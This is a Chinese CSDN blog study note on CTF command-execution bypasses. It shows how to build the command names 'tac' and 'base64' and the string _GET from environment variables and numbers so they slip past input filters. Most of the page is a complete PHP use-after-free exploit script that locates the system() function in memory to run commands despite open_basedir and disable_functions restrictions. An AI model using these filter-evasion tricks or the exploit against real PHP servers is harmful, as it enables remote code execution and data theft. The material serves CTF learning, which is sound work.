Web1-Day13

已于 2022-02-10 16:56:03 修改
阅读量2.7k 收藏
点赞数
分类专栏: 学习笔记 文章标签: 网络安全
于 2022-02-10 16:44:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kanna_bush_t/article/details/122863106
版权

二、命令执行

2.7 常见的绕过姿势

2.7.6 系统命令构造数字

  • {_} = ""
  • $(())=0
  • $((~$(())))=-1

2.7.7 服务器变量构造查询语句

a.常见的系统变量

  • 系统变量:
PHP_CFLAGS=-fstack-protectcor-strong-fpic-fpie-o2-D_LARGEFILE_SOURCE -D_FI
LE_OFFSET_BITS=64
PHP_VERSION=7.3.22 
SHLVL=2 

[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
[HOSTNAME] => glot-runner 
[PHPIZE_DEPS] => autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c 
[PHP_INI_DIR] => /usr/local/etc/php 
PHP_CFLAGS] => -fstack-protector-strong -fpic -fpie -O2
[PHP_CPPFLAGS] => -fstack-protector-strong -fpic -fpie -O2
[PHP_LDFLAGS] => -Wl,-O1 -Wl,--hash-style=both -pie

[GPG_KEYS] => 1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2 D6021E995DC9FF8D3EE5AF27F

[PHP_VERSION] => 7.2.1
[PHP_URL] => https://secure.php.net/get/php-7.2.1.tar.xz/from/this/mir ror
[PHP_ASC_URL] => https://secure.php.net/get/php-7.2.1.tar.xz.asc/from/ this/mirror
[PHP_SHA256] => 6c6cf82fda6660ed963821eb0525214bb3547e8e29f447b9c15b2d 8e6efd8822
[PHP_MD5] =>
[HOME] => /home/glot
[PHP_SELF] => /tmp/543750210/main.php
[SCRIPT_NAME] => /tmp/543750210/main.php
[SCRIPT_FILENAME] => /tmp/543750210/main.php
[PATH_TRANSLATED] => /tmp/543750210/main.php
[DOCUMENT_ROOT] =>
[REQUEST_TIME_FLOAT] => 1524198667.12
[REQUEST_TIME] => 1524198667
[argv] => Array
(
[0] => /tmp/543750210/main.php
)
[argc] => 1
)

b.构建tac

tac====>${PHP_CFLAGS:${PHP_VERSION:${PHP_VERSION:~A}:~${SHLVL}}:${PHP_VERSION:${PHP_VERSION:~A}:~${SHLVL}}}
首先获取到3以便于得到 PHP_CFLAGS 中的tac:
PHP_VERSION 中截取   ${PHP_VERSION:2:1} //切片操作
这里的2: 可以用 ${PHP_VERSION:~A} 得到字符串的最后⼀位
这里的1: 可以用 ${~SHLVL} 得到,因为按位取反10取反得到01所以 2=1
因此: 3=${PHP_VERSION:${PHP_VERSION:~A}:~${SHLVL}}
最终的tac命令:
a. ${PHP_CFLAGS:3:3} //切⽚操作,也就是上⾯3的语句直接复制⼀遍
也就是:
${PHP_CFLAGS:${PHP_VERSION:${PHP_VERSION:~A}:${~SHLVL}}:${
PHP_VERSION:${PHP_VERSION:~A}:~${SHLVL}}} //得到tac指令

c.构建base64

PHP_CFLAGS=-fstack-protectcor-strong-fpic-fpie-o2-D_LARGEFILE_SOURCE -D_FI LE_OFFSET_BITS=64 
PHP_VERSION=7.3.22 
SHLVL=2 
???? //代表base 
${#PHP_VERSION}${PHP_CFLAGS:~A} //代表64 
//题目需要base64命令的绝对路径:
${PWD::${#SHLVL}} //代表'/' 
${#SHLVL} //#用来求变量值的长度
//初次完整的命令:
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}????${#PHP_VERSION}${PHP_CFLAGS:~A} ????.??? //长度超过//限制需要缩减
// 随机数:
${RANDOM} //随机代表一个数
${#RANDOM} //代表这个随机数的长度
//由于64代表的字符串过长,将6代表的字符串去掉(用?代替)将4代表的字符串用随机数的长度字符串代替
//最终的语句:
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.??? //带有随机性,只要${RANDOM}//是一个四位数就可以,多试几次

2.7.8 以数字和不敏感函数构造敏感函数

  •  base_convert(1231231131,10,36) ===>hex2bin
  •  hex2bin(dechex(1598506324))=======>_GET
  •  $hex2bin(dechex(1598506324))=======>$_GET

2.7.9 open_basedir()绕过

a.传脚本绕过


<?php 
function ctfshow($cmd) { 
global $abc, $helper, $backtrace; 
class Vuln { 
public $a; 
public function __destruct() { 
global $backtrace; 
unset($this->a); 
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
?>

kanna_bush_t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web1 命令执行(三)
weixin_53896576的博客
02-07 458
7. 无参 RCE 构造 https://blog.csdn.net/qi_SJQ_/article/details/119457821 算是一种特殊的绕过方式,套娃形式,数学函数的理解,不过未限制长度。 chr():根据ascii码值将数字转换成字符串 get_defined_vars() 获取题目相关变量 print_r() 函数用于打印变量,以更容易理解的形式展示 localeconv():是一个编程语言函数,返回包含本地数字及货币信息格式的数组。其中数组中 的第一个为点号(.) pos():
PHP全局变量
one312的专栏
01-30 745
php超级全局变量(以http://localhost/server.php?a=1&b=2为例) 一、$GLOBALS Array ( [_GET] => Array ( [a] => 1 [b] => 2 ) [_POST] => Array ...
【命令执行--持续更新】
最新发布
qq_74240553的博客
02-18 1831
CTFshow
【无标题】
qq_60518252的博客
02-08 1012
8.扫描目录(补) print_r扫描目录 c=print_r(scandir('.')); #查看当前目录 c=print_r(scandir('/')); #查看根目录 c=print_r(glob('*')); #查看当前目录 c=print_r(glob('/*')); #查看根目录 var_dump扫描目录 c=var_dump(scandir('.')); #查看当前目录 c=var_dump(scandir('/')); #查看根目录 c=var_dump(glob(
makefile的选项CFLAGS、CPPFLAGS、LDFLAGS和LIBS的区别
jfkidear的专栏
12-05 4万+
makefile的选项CFLAGS、CPPFLAGS、LDFLAGS和LIBS的区别 LDFLAGS是选项,LIBS是要链接的库。都是喂给ld的,只不过一个是告诉ld怎么吃,一个是告诉ld要吃什么。 网上不难搜索到上面这段话。不过“告诉ld怎么吃”是什么意思呢? 看看如下选项: LDFLAGS = -L/var/xxx/lib -L/opt/mysql/lib LIBS = -l
WebAPI-day-01.md
10-23
自给学习整理的笔记,即可以为自给提供复习,也可以为大家提供帮助。喜欢请关注
responsive-web-day-1
04-01
标题“responsive-web-day-1”表明这是一个关于响应式网页设计的初步学习或教程的第一部分。在这个主题中,我们将深入探讨HTML在构建响应式网页中的关键作用。 HTML(HyperText Markup Language)是创建网页的基础...
web-day4.rar
03-30
【标题】"Web-Day4"通常指的是一个关于Web技术的培训课程或研讨会的第四天内容,可能涵盖了Web开发中的高级主题或特定技术的深入探讨。由于没有具体的标签信息,我们无法得知具体涉及哪些技术,但根据一般的Web开发...
Microsoft-Web-Platform-Day
05-19
#Microsoft Web平台日(动手实践) 一整天致力于下一个Microsoft Web平台。 我们将通过演示和动手实验来研究ASP.Net 5,Microsoft Edge,Visual Studio和Azure。 您将需要在实验室中使用带有Visual Studio 2015的...1
webAPIs-day02笔记.md
12-06
webAPIs-day02笔记.md
docker配置nginx+php环境实操
TROUBLE I AM IN
06-17 2508
参考内容 参考博客 1 原理讲解 1.1 php-fpm和nginx 1.2 整体架构 宿主机部分 www:用来存放项目代码 nginx/nginx:用来存放nginx配置文件 php:用来存放 php 配置文件 log nginx:存放nginx的日志 php:用来存放 php 的日志 hosts php-fpm/hosts:用来存放 php-fpm 的容器的 hosts nginx/hosts:用来存放 nginx 的 hosts 容器1 运行 Nginx 应用,并对外暴露 80端口
用 Docker 搭建 PHP 开发环境,已经是常态
weixin_43503815的博客
10-24 3295
用 Docker 搭建 PHP 开发环境,已经是常态 docker搭建php环境,因为是本地的开发环境,所以想多尝尝鲜,尽量使用高版本的软件来实现。 希望能给同样有需要搭建环境的同学起到一些帮助,少踩一些坑,如果能按照这篇文章的步骤一次搞定那是最好了。 先来说一下环境: Docker 18.09.2 Nginx 1.17.1 PHP 7.3.7 XDebug 2.7.2 PhpStorm 2019.1.3 VSCode 1.36.1 1、Docker 的安装,我这里是Mac版的。 这里大家直接在 Dock
docker php 扩展安装合集
weixin_42900170的博客
10-22 915
在安装SuiteCRM的过程中遇到了 没有zip扩展功能的问题,经过一番折腾,找到了这个文章,在此转发分享,希望对其他人有所帮助。 1.先进入myphp容器,看一下php目前安装了哪些扩展: $ docker exec -it myphp /bin/bash root@myphp:/# php -m [PHP Modules] Core 、ctype、curl、date、dom、fileinfo、filter、ftp、hash、iconv、json、libxml、mbstring、mysqli、mys
Dockerfile 安装php的soap扩展
JFENG14的博客
02-18 903
在Dockerfile文件中添加: # soap RUN apt-get install -y --no-install-recommends libxml2-dev libtidy-dev libxslt1-dev && \ rm -r /var/lib/apt/lists/* && \ docker-php-ext-install soap 其他的一些扩展安装:docker php 扩展安装合集_lggirls的博客-CSDN博客_docker ph
PHP编译选项
weixin_34013044的博客
04-22 108
apache模块 语法:--with-apache=DIR 说明:用本选项可以让PHP以apache的模块方式使 用,DIR的字符串可以是/usr/local/apache或其它安装apache的目录 范例:--with- apache=/var/lib/apache fhttpd服务器模块 语法:--with-fhttpd=DIR 说明...
PHP编译安装 PHP各编译参数配置详解
wuhuagu_wuhuaguo的博客
04-03 2559
php编译安装的基本步骤 //首先要下载一个php的安装包,例如:php-5.6.25.tar.gz, tar zxvf php-5.6.25.tar.gz // 解压php安装包,得到一个php-5.6.25的文件夹 cd php-5.6.25 ./configure //对php的安装进行配置,后面要加配置选项 # make && mak...
CFLAGS详解
热门推荐
xinyuan510214的专栏
01-04 8万+
Makefile选项CFLAGS,LDFLAGS,LIBS CFLAGS 表示用于 C 编译器的选项, CXXFLAGS 表示用于 C++ 编译器的选项。 这两个变量实际上涵盖了编译和汇编两个步骤。 CFLAGS: 指定头文件(.h文件)的路径,如:CFLAGS=-I/usr/include -I/path/include。同样地,安装一个包时会在安装路径下建立
CFLAGS参数详解(Desktop cflags)
huanny2005的专栏
01-05 2922
CFLAGS 是决定 Gentoo 系统效能与稳定的关键之一。恰当的 CFLAGS 能在效能、编译时间、与系统稳定度中取得平衡,失败的 CFLAGS 可能导致编译失败,甚至系统损毁。那么,在茫茫 CFLAGS 海中,如何才能捞到命中注定那根针呢?  此文件的 CFLAGS 针对 x86 与 x86-64 平台上的 GCC 3.4 (GNU Compiler Collections - htt
PHP编译参数详解
菜鸟先飞
03-23 734
Fast-CGI:    ./configure --prefix=/usr/local/php --enable-fastcgi --enable-force-cgi-redirect --with-config-file-path=/etc --with-zlib --with-mysql --with-xml --with-gd --enable-gd-native-ttf --e
Error reading file D:/java-EE-web1-pro/day01-maven-01/pom.xml
05-20
这个错误提示说明程序无法读取指定的文件D:/java-EE-web1-pro/day01-maven-01/pom.xml。可能是文件不存在、文件路径错误或者没有读取权限等问题导致的。你可以检查一下文件路径是否正确,文件是否存在以及程序是否有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值